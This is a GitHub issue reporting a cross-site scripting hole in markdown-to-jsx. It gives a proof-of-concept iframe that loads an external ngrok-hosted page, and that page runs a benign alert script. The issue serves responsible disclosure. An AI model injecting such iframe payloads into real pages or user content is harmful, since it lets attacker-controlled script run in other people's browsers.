
XSS via <iframe> src attribute

Open Ryan-Awad opened this issue 7 months ago • 0 comments

Hello,

I was able to execute some JS by loading an external HTML document via the src attribute in an iframe tag.

<iframe src="https://my-malicious-web-page.ngrok-free.app/"></iframe>

Where the web page I loaded contains the following HTML:

<!DOCTYPE html>
<html>
  <head></head>
  <body>
    <h1>Hello World</h1>
    <script>alert("Hello world");</script>
  </body>
</html>


Try it out in the playground: https://markdown-to-jsx.quantizor.dev/

I'm not sure which sanitizer is being used in the playground, but I don't think JS should ever be executed in MD, regardless of the sanitizer.

Thank you!

Ryan-Awad, May 21 '25 19:05